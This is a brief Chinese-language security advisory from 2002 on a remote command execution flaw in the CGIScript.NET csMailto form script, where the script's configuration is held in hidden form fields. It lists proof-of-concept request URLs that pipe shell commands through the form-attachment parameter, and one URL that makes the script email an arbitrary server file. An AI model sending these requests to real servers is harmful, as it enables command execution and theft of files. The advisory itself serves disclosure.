CGIScript.NET csMailto隐藏表单栏远程命令可执行漏洞发布时间:2002-04-26 更新时间:2002-04-26 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:4579 受影响系统 CGIScript.NET csMailto详细描述 CGIScript.NET csMailto是设计用于支持多个mailto:的表单程序。 用于脚本的配置值包含在隐藏表单值,结果可导致攻击者修改这些值来执行任意命令。 测试代码 CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform 解决方案 尚无 相关信息 Steve Gustin <stegus1@yahoo.com>. 参考:http://online.securityfocus.com/archive/1/269143 相关主页:http://www.cgiscript.net/ |
